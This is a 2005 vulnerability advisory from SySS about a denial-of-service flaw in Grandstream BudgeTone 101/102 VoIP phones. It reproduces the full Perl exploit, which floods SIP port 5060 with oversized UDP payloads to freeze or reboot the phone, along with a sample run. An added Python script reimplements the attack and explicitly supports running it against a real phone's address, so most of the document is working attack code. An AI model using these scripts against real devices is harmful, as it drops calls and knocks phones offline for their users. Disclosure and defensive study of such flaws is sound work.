-------------------------------------------------------------------
SySS-Advisory: Grandstream Budge Tone 101/102 DoS Vulnerability
-------------------------------------------------------------------

Problem discovered:     July 20th 2005
Vendor contacted:       July 21st 2005
Advisory published on:  August 12th 2005

AUTHOR:
  Pierre Kroma (kroma@syss.de)
  SySS GmbH
  72070 Tuebingen / Germany
  Tel.: +49-7071-407856-0
  Key fingerprint = 927A B13E 16F5 BBAB 8F17 75EB D8E1 A9A4 F257 4EEC

DEVICE:
  Grandstream Budge Tone-101
  Grandstream Budge Tone-102

AFFECTED VERSIONS:
  possibly all firmware versions <= 1.0.6.7 (only firmware 1.0.6.7 was tested)

EXPLOIT:                attached (grandstream-DoS.pl, reproduced below)
VENDOR STATUS:          informed
SEVERITY:               medium
Remotely exploitable:   yes

DESCRIPTION:

It is possible to mount a denial-of-service attack against this VoIP
hardware phone. Sending a UDP packet larger than 65534 bytes to port
5060 (the SIP port) stops the device:

  - any active telephone call is aborted,
  - the display goes blank and freezes,
  - the integrated HTTP server is no longer reachable.

The phone must be powered off and on again to recover. A packet of
exactly 65534 bytes may instead reboot the device. Smaller packets
have no effect.

NOTE: a single IPv4 UDP datagram carries at most 65507 bytes of payload
(65535 minus the 20-byte IP header and the 8-byte UDP header); the socket
layer of the sending host refuses a larger send with EMSGSIZE ("Message
too long"). The attached script writes its 65534/65535-byte string with
print(), which Perl's buffered I/O layer flushes in pieces of the PerlIO
buffer size (8192 bytes by default), so what reaches the phone is a burst
of eight datagrams sent back to back (seven of 8192 bytes and one of 8190
or 8191 bytes), not one oversized packet. Anyone reproducing or filtering
this traffic should work from those datagram sizes.

############################################################################
EXAMPLE (sample run of the attached script; the target address is masked):

Grandstream BT101/BT102 DoS
written by pierre kroma (kroma@syss.de)

ping the remote device xxx.xxx.xxx.xxx
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=250 time=0.479 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=250 time=0.406 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=250 time=0.404 ms

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.404/0.429/0.479/0.042 ms

 Wait ...

ping the remote device xxx.xxx.xxx.xxx again
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx) 56(84) bytes of data.

--- xxx.xxx.xxx.xxx ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms
############################################################################

ATTACHMENT: grandstream-DoS.pl
############################################################################
#!/usr/bin/perl
#
# Grandstream BT101/BT102 DoS
# written by pierre kroma (kroma@syss.de)
#
use strict;
use warnings;
use IO::Socket;
use Term::ANSIColor;

############################ U S A G E ############################
system("clear");
print "\nGrandstream BT101/BT102 DoS\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";

if (@ARGV < 3) {
    print qq~
Usage: perl grandstream-DoS.pl <ip-addr> <udp-port> {-r/-s}

	<ip-addr>  = ;-)
	<udp-port> = 5060

	-r = 'reboot'   the Grandstream BT 101/102 (65534 bytes)
	-s = 'shutdown' the Grandstream BT 101/102 (65535 bytes)

~;
    exit 1;
}
######################## D E F I N I T I O N S ########################

my ($victim, $port, $option) = @ARGV;
my $request;

# Compare strings with eq, not ==: numerically every one of these strings
# is 0, so the original "==" tests matched whatever was passed.
(my $opt = lc $option) =~ s/^-//;     # accept -r/-R/r/R and -s/-S/s/S
if ($opt eq 'r') {
    $request = 'k' x 65534;
}
elsif ($opt eq 's') {
    $request = 'p' x 65535;
}
else {
    print "Wrong parameter - try it again\n";
    exit 1;
}

# ping the remote device
print color 'bold blue';
print "\nping the remote device $victim\n";
print color 'reset';
system('ping', '-c', '3', $victim);

print color 'bold red';
print "\n Wait ... \n\n\n";
print color 'reset';

my $sox = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $port,
    PeerAddr => $victim,
) or die "cannot open UDP socket to $victim:$port: $!\n";

# print() goes through Perl's buffered I/O layer, which flushes every
# 8192 bytes (the default PerlIO buffer), so the payload leaves as a
# burst of datagrams of at most 8192 bytes rather than as one 65534-
# or 65535-byte datagram; a single IPv4 UDP datagram cannot carry more
# than 65507 bytes anyway (the kernel rejects it with EMSGSIZE).
print $sox $request or die "send failed: $!\n";
sleep 1;
close $sox;

# ping the remote device again
print color 'bold blue';
print "ping the remote device $victim again\n";
print color 'reset';
system('ping', '-c', '3', $victim);
############################################################################
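The following Python script is an added example and is not part of the SySS advisory or its Perl attachment. It reproduces the advisory's procedure (ping, send the payload, wait a second, ping again) but makes the datagram boundaries explicit: it shows that a single 65534- or 65535-byte datagram is refused by the sending host with EMSGSIZE, that the largest datagram that can leave at all carries 65507 bytes, and that sending the payload through 8192-byte buffered writes, as the Perl script's print() does, yields a burst of eight datagrams. The loopback listener standing in for the phone, the 8192-byte PerlIO buffer size and all function names (datagram_sizes, send_payload, loopback_demo, run_attack) are this example's own assumptions; run it with the phone's address as the first argument to follow the advisory's steps against a real target.

```python
import errno
import socket
import subprocess
import sys
import time

IP_HDR, UDP_HDR, IP_MAX = 20, 8, 65535
MAX_UDP_PAYLOAD = IP_MAX - IP_HDR - UDP_HDR   # 65507: largest single datagram
PERLIO_BUFSIZ = 8192    # assumed default PerlIO buffer; print() flushes in these pieces
SIP_PORT = 5060
MODES = {"reboot": 65534, "shutdown": 65535}  # payload sizes from the advisory


def datagram_sizes(total, chunk):
    """Datagram lengths a write of `total` bytes produces when the I/O layer
    flushes every `chunk` bytes (what the Perl script's print() does)."""
    full, rest = divmod(total, chunk)
    return [chunk] * full + ([rest] if rest else [])


def send_payload(host, port, payload, chunk=None):
    """Send `payload` as UDP datagrams of at most `chunk` bytes (None: try
    one datagram). Returns (sizes actually sent, errno name or None); an
    oversized single datagram fails with EMSGSIZE before anything leaves."""
    sizes = datagram_sizes(len(payload), chunk or len(payload))
    sent, off = [], 0
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        # hosts such as macOS cap UDP sends at their default send-buffer size
        # unless it is raised; harmless on Linux
        s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1 << 17)
        for n in sizes:
            try:
                s.sendto(payload[off:off + n], (host, port))
            except OSError as e:
                return sent, errno.errorcode.get(e.errno, str(e.errno))
            sent.append(n)
            off += n
    return sent, None


def loopback_demo():
    """Offline run: a throwaway UDP listener on 127.0.0.1 (assumed stand-in
    for the phone) records the datagram lengths that really arrive."""
    out = {}
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as lst:
        lst.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1 << 20)
        lst.bind(("127.0.0.1", 0))
        lst.settimeout(2)
        host, port = lst.getsockname()
        for mode, size in MODES.items():
            payload = b"k" * size
            single = send_payload(host, port, payload)                # rejected
            burst = send_payload(host, port, payload, PERLIO_BUFSIZ)  # Perl's burst
            got = [len(lst.recvfrom(IP_MAX)[0]) for _ in burst[0]]
            out[mode] = {"single": single, "burst": burst[0], "received": got}
        out["max"] = send_payload(host, port, b"k" * MAX_UDP_PAYLOAD)
        out["max_received"] = len(lst.recvfrom(IP_MAX)[0])
    return out


def run_attack(host, port=SIP_PORT, mode="shutdown"):
    """The advisory's procedure against a real target: ping, send the
    payload the way the Perl script does, wait a second, ping again."""
    ping = ["ping", "-c", "3", host]
    before = subprocess.run(ping, stdout=subprocess.DEVNULL).returncode == 0
    sent, err = send_payload(host, port, b"k" * MODES[mode], PERLIO_BUFSIZ)
    time.sleep(1)
    after = subprocess.run(ping, stdout=subprocess.DEVNULL).returncode == 0
    return {"ping_before": before, "sent": sent, "error": err, "ping_after": after}


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(loopback_demo())          # no target given: offline demonstration
    else:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else SIP_PORT
        flag = sys.argv[3].lstrip("-").lower() if len(sys.argv) > 3 else "s"
        print(run_attack(sys.argv[1], port, {"r": "reboot", "s": "shutdown"}[flag]))
```

Run without arguments to see the offline demonstration; `python3 script.py <ip-addr> 5060 -r` mirrors the Perl invocation. The `received` lists are what a packet filter in front of the phone would actually see, which is why a rule keyed on a single 65534-byte datagram would never match this traffic.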